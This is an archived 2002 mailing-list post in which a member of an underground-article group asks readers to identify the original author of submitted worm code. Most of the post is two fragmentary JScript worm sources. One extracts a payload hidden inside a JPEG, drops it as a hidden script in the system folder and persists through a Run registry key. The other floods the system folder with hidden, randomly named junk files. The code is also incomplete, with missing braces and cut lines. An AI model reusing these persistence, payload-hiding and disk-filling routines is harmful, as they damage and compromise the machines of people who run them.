Stolen source?

From: Arturo \ (buanzoat_private)
Date: Sun Mar 17 2002 - 20:13:29 PST

  • Next message: Frog Man: "Re: CSS implication"

    Do you recognize this source code? Can you tell which is the real/original
    I explain: I am a member of the Raregazz Team, we produce (!) series of
    underground-related articles. On the 18th edition, a non-member send us an
    article which was half-stolen from another author (not well known either
    of them). Now, he is sending us another article, a source-code explanation
    for a worm. This source code makes me remember of someone else's...
    So, I would like to find:
    a) the original author or at least
    b) know if this source is not an original (i.e is stolen)
    Thank you!
      var ob, ws, ws2, g, g2, t, yu, ly, f, f2;
      ob = new ActiveXObject("Scripting.FileSystemObject");
      ws = WScript.CreateObject ("WScript.Shell");
      n = ob.GetSpecialFolder(1)+"\\";
      yu = ran();
      ly = n+yu+".js";
    function mai(){
      ws2 = ws.RegRead("HKCU\\Control Panel\\Desktop\\MenuShowDelay");
    if (ws2 != "auto"){
      ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"+yu, l
    y, "REG_SZ");
      ws.RegWrite("HKCU\\Control Panel\\Desktop\\MenuShowDelay", "auto", "REG_SZ");
      g = ob.GetFile("girl.jpg");
      f = g.OpenAsTextStream(1, -2);
      g2 = f.ReadAll();
      g2 = g2.substring(31029, 32457);
      t = ob.OpenTextFile(ly, 2, true);
      f2 = ob.GetFile(ly);
      f2.attributes = f2.attributes + 4;
    function ran(){
      rr = new Array(15);
      rr[0] ="$mstask"; rr[1] ="$command"; rr[2] ="$explorer"; rr[3] ="$alg"; rr[4]
     ="$logon"; rr[5] ="$ie"; rr[6] ="$icq"; rr[7] ="$win"; rr[8] ="$system"; rr[9]
     ="$sys"; rr[10] ="$scanreg"; rr[11] ="$yahoo"; rr[12] ="$msn"; rr[13] ="$clock
    "; rr[14] ="$logger"; rr[15] ="$yl";
      var irr = rr[parseInt(Math.round(Math.random()*15))];
      return (irr);
    /* second source code */
      var ob, f, f2, t, t2, n, w, ry0, ry1;
      ob = new ActiveXObject("Scripting.FileSystemObject");
      t = new Date();
      t2 = t.getHours()+t.getMinutes()+t.getSeconds();
      n = ob.GetSpecialFolder(1)+"\\";
    function wrote(){
      ry0 = ran();
      ry1 = ran2();
      w = n+ry0+t2+ry1;
      f = ob.OpenTextFile(w, 2, true);
      for (q = 0; q < 1000; q++){rew();}
      f2 = ob.GetFile(w);
      f2.attributes = f2.attributes + 4;
    function ran(){
    rr = new Array(15);
    rr[0] ="mstask."; rr[1] ="command."; rr[2] ="explorer."; rr[3] ="alg."; rr[4] =
    "logon."; rr[5] ="ie."; rr[6] ="leeme."; rr[7] ="win."; rr[8] ="system."; rr[9]
     ="sys."; rr[10] ="scanreg."; rr[11] ="icq."; rr[12] ="msn."; rr[13] ="clock.";
     rr[14] ="logger."; rr[15] ="yl.";
    var irr = rr[parseInt(Math.round(Math.random()*15))];
    return (irr);
    function ran2(){
    rr2 = new Array(15);
    rr2[0] =".exe"; rr2[1] =".doc"; rr2[2] =".com"; rr2[3] =".bat"; rr2[4] =".tmp";
     rr2[5] =".xls"; rr2[6] =".ini"; rr2[7] =".inf"; rr2[8] =".vxd"; rr2[9] =".dll"
    ; rr2[10] =".htm"; rr2[11] =".cpl"; rr2[12] =".sys"; rr2[13] =".dat"; rr2[14] =
    ".yl"; rr2[15] =".hex";
    var irr2 = rr2[parseInt(Math.round(Math.random()*15))];
    return (irr2);
    function rew(){
      f.Write(":::: GusanoDisk Y v5.recover ::::");
      f.Write("Creado :: "+ t2);
      for (q = 0; q < 900; q++){f.Write("GusanoDisk Y by HeX. Gracias por sus

    This archive was generated by hypermail 2b30 : Sun Mar 17 2002 - 21:24:18 PST